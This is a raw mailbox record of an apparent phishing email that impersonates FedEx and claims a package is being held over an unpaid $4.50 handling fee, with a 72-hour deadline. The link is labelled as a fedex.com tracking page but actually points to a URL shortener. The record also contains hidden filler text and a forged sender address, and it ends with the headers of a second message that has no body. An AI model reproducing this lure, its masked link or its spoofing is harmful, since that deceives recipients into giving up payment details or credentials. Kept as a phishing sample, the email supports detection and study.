From: shipment@fedex.com
To: jose@monkey.org
Subject: Track Your Shipment | FedEx|
Date: 01 Nov 2018 09:26:12 -0700
Message-ID: <20181101092612.E3A20027936D762D@fedex.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0012_C752D40B.AC4B66D6"
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 638


------=_NextPart_000_0012_C752D40B.AC4B66D6
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable

Enter your tracking number to track and pay

------=_NextPart_000_0012_C752D40B.AC4B66D6
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.10570.1001"></HEAD>
<BODY style=3D"MARGIN: 0.5em">
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
><IMG alt=3D"FedEx Home" src=3D"https://images.fedex.com/images/c/t1/gh/log=
o-header-fedex-express.png"><BR><BR>Dear Customer,</P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
>Your package has been returned to the FedEx office.<BR>The reason for the =
return is - payment of shipping costs.<BR>
the cost of your shipment is not paid yet so you will be charged to pay han=
dling cost $4.50.<BR>You have a period of 72 hours to recover your package,=
 otherwise it will be returned to the sender.<BR><BR></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial">
Enter your tracking number to track and pay<BR><BR><FONT style=3D"BACKGROUN=
D-COLOR: rgb(255,255,255)" color=3D#000000><STRONG>Tracking Numbers :</STRO=
NG></FONT><BR></P>
<H2 id=3Dx_x_x_x_ecxyui_3_16_0_1_1421937263738_21639 style=3D"WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); PADD=
ING-BOTTOM: 0px; PADDING-TOP: 0px; FONT: 15px/21px Verdana, Arial; PADDING-=
LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px 0px 10px; LETTER-SPACING: nor=
mal; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0=
px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-de=
coration-color: initial"></H2>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial"></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial"></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px;=
 font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st=
roke-width: 0px; text-decoration-style: initial; text-decoration-color: ini=
tial"></P>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
>
<TABLE id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_1=
6_0_1_1401807633682_59616 style=3D"FONT-SIZE: 11px; HEIGHT: 15px; FONT-FAMI=
LY: arial, sans-serif; WIDTH: 254px; WHITE-SPACE: normal; WORD-SPACING: 0px=
; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(34,34,34); PADDING-=
BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; ORPHA=
NS: 2; WIDOWS: 2; LETTER-SPACING: normal; LINE-HEIGHT: 15px; PADDING-RIGHT:=
 0px; BACKGROUND-COLOR: rgb(255,255,255);=20
TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=
; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-deco=
ration-color: initial" cellSpacing=3D0 cellPadding=3D10 border=3D0>
<TBODY id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_1=
6_0_1_1401807633682_59615 style=3D"WIDTH: 530px; LINE-HEIGHT: 15px">
<TR id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_0=
_1_1401807633682_59614 style=3D"LINE-HEIGHT: 15px">
<TD id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_0=
_1_1401807633682_59613 style=3D"FONT-FAMILY: arial, sans-serif; BORDER-SPAC=
ING: 2px; LINE-HEIGHT: 15px; BACKGROUND-COLOR: rgb(232,241,250)"><SPAN styl=
e=3D"FONT-FAMILY: arial, sans-serif, serif, EmojiFont; FONT-WEIGHT: bold; L=
INE-HEIGHT: 15px">
<UL style=3D"MARGIN-TOP: 0px">
<LI>
<H4 style=3D"FONT-SIZE: 11px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); FONT=
-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT:=
 0px"><FONT color=3D#44bb47 size=3D4>780032194102</FONT></H4></LI></UL></SP=
AN></TD>
<TD id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407yui_3_16_0_1_1402917244929=
_62474 style=3D"FONT-SIZE: 0px; FONT-FAMILY: Arial, Helvetica, sans-serif; =
COLOR: rgb(255,255,255); BORDER-SPACING: 2px; LINE-HEIGHT: 0px" vAlign=3Dto=
p align=3Dleft>djdj</TD></TR></TBODY></TABLE>
<BR style=3D"FONT-SIZE: 11px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR=
: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING:=
 normal; LINE-HEIGHT: 15px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT=
: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-t=
ext-stroke-width: 0px; text-decoration-style: initial; text-decoration-colo=
r: initial">
<A style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: n=
ormal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(1,134,186); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: no=
rmal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-li=
gatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px"=
 href=3D"http://op.pe/678bb" rel=3Dnoreferrer target=3D_blank><FONT size=3D=
2>Click here to view the status of your order<BR>
fedex.com/apps/fedextrack/?action=3Dtrack</FONT></A><FONT style=3D"FONT-FAM=
ILY: arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSF=
ORM: none; FONT-WEIGHT: 400; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPH=
ANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,25=
5); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: no=
rmal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-=
decoration-color: initial" size=3D3><SPAN>&nbsp;</SPAN>
 <SPAN>&nbsp;</SPAN></FONT><BR style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial=
, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none;=
 FONT-WEIGHT: 400; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WI=
DOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-I=
NDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -web=
kit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration=
-color: initial"></P>
<H2 id=3Dx_x_x_x_ecxyui_3_16_0_1_1421937263738_21639 style=3D"WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); PADD=
ING-BOTTOM: 0px; PADDING-TOP: 0px; FONT: 15px/21px Verdana, Arial; PADDING-=
LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px 0px 10px; LETTER-SPACING: nor=
mal; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0=
px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-de=
coration-color: initial">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_=
0_1_1401807633682_59620 style=3D"FONT-SIZE: 11px; FONT-FAMILY: arial, sans-=
serif, serif, EmojiFont; FONT-WEIGHT: normal; PADDING-TOP: 0px; LINE-HEIGHT=
: 15px; BORDER-TOP-WIDTH: 0px">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_=
0_1_1401807633682_59619 style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 15px; BORDE=
R-TOP-WIDTH: 0px">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyiv2560135160yui_3_16_=
0_1_1401807633682_59619 style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 15px; BORDE=
R-TOP-WIDTH: 0px">
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyui_3_16_0_1_140215707=
5943_8702 style=3D"FONT-FAMILY: Calibri, sans-serif, serif, EmojiFont; COLO=
R: rgb(68,68,68); PADDING-TOP: 0px; LINE-HEIGHT: 21px; BORDER-TOP-WIDTH: 0p=
x"><SPAN style=3D"FONT-SIZE: small; LINE-HEIGHT: 18px"><FONT style=3D"LINE-=
HEIGHT: normal" size=3D3></FONT></SPAN>&nbsp;</DIV>
<DIV id=3Dx_x_x_x_ecxyiv1580565887ecxyiv7647241407ecxyui_3_16_0_1_140215707=
5943_8704 style=3D"FONT-FAMILY: Calibri, sans-serif, serif, EmojiFont; COLO=
R: rgb(68,68,68); LINE-HEIGHT: 21px"><SPAN style=3D"FONT-SIZE: small; LINE-=
HEIGHT: 18px"><FONT style=3D"LINE-HEIGHT: normal" size=3D3>
<SPAN class=3D"x_x_x_contextualExtensionHighlight x_x_x_ms-font-color-theme=
Primary x_x_x_ms-border-color-themePrimary x_x_x_ident_596_602" style=3D"BO=
RDER-TOP-COLOR: rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BOR=
DER-LEFT-COLOR: rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rg=
b(67,33,88)">
<SPAN class=3D"x_x_contextualExtensionHighlight x_x_ms-font-color-themePrim=
ary x_x_ms-border-color-themePrimary x_x_ident_625_631" style=3D"BORDER-TOP=
-COLOR: rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BORDER-LEFT=
-COLOR: rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rgb(67,33,=
88)">
<SPAN class=3D"x_contextualExtensionHighlight x_ms-font-color-themePrimary =
x_ms-border-color-themePrimary x_ident_661_667" style=3D"BORDER-TOP-COLOR: =
rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BORDER-LEFT-COLOR: =
rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rgb(67,33,88)">
<SPAN class=3D"contextualExtensionHighlight ms-font-color-themePrimary ms-b=
order-color-themePrimary ident_702_708" style=3D"CURSOR: pointer; BORDER-TO=
P-COLOR: rgb(67,33,88); BORDER-BOTTOM: rgb(67,33,88) 1px dashed; BORDER-LEF=
T-COLOR: rgb(67,33,88); COLOR: rgb(67,33,88); BORDER-RIGHT-COLOR: rgb(67,33=
,88)">best regards</SPAN></SPAN></SPAN></SPAN></FONT></SPAN></DIV></DIV></D=
IV></DIV></H2>
<P style=3D"FONT-SIZE: 13px; FONT-FAMILY: Helvetica, Arial, sans-serif; WHI=
TE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: nor=
mal; COLOR: rgb(102,102,102); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LE=
TTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px"=
><BR>&nbsp;</P></BODY></HTML>
------=_NextPart_000_0012_C752D40B.AC4B66D6--


From jose@monkey.org Mon Nov  5 20:05:36 2018 +0000
Return-Path: javalos@xktengineering.com
Delivered-To: jose@monkey.org
X-FDA: 74798791872.14.limit05_30d8d0ee23159
X-Spam-Summary: 50,0,0,b95df6412ffbeb9f,d41d8cd98f00b204,javalos@xktengineering.com,:,RULES_HIT:4:41:72:355:375:379:495:800:962:967:969:973:983:988:989:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1561:1571:1588:1589:1593:1594:1714:1719:1730:1747:1777:1792:2194:2198:2199:2200:2393:2525:2527:2560:2563:2682:2685:2693:2828:2859:2895:2899:2901:2915:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3421:3585:3586:3867:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4361:4552:5007:6261:6669:6671:6674:6684:8513:8515:8603:8957:9025:9108:9908:10004:10346:10954:11026:11473:11657:11658:11914:12043:12219:12438:12517:12519:12555:12740:12895:12955:12958:12967:12986:13007:13132:13139:13231:13374:13439:13546:13551:14096:14827:18000:21062:21080:21433:21436:21450:21451:21483:21524:21554:21611:21627:21660:21810:21819:30021:30022:30054:30069:30070,0,RBL:72.47.196.245:@xktengineering.com:.lbl8.mailshell.
X-HE-Tag: limit05_30d8d0ee23159
X-Filterd-Recvd-Size: 19585
Received: from xktengineering.com (xktengineering.com [72.47.196.245])
	by imf09.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  5 Nov 2018 20:05:35 +0000 (UTC)
Received: from xktengineering.com (unknown [142.44.131.68])
	by xktengineering.com (Postfix) with ESMTPSA id A77935E011
	for <jose@monkey.org>; Mon,  5 Nov 2018 11:41:55 -0800 (PST)
